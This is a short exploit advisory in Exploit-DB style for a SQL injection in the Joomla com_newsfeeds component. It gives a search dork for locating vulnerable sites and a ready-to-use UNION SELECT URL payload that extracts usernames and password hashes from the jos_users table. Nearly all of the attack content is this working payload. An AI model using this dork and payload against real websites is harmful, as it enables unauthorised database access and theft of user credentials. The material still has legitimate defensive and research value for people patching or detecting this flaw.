# Exploit Title: Joomla Component com_newsfeeds SQL injection vulnerability
# Date: 2020.03.10
# Author: Milad Karimi
# Software Link:
# Version:
# Category : webapps
# Tested on: windows 10 , firefox
# CVE : CWE-89
# Dork: inurl:index.php?option=com_newsfeeds
Email : miladkarimi311@yahoo.com
instagram: @m.i.l.a.d_._k.a.r.i.m.i
index.php?option=com_newsfeeds&view=categories&feedid=[sqli]
Demo:
http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
#Discovered by : Milad Karimi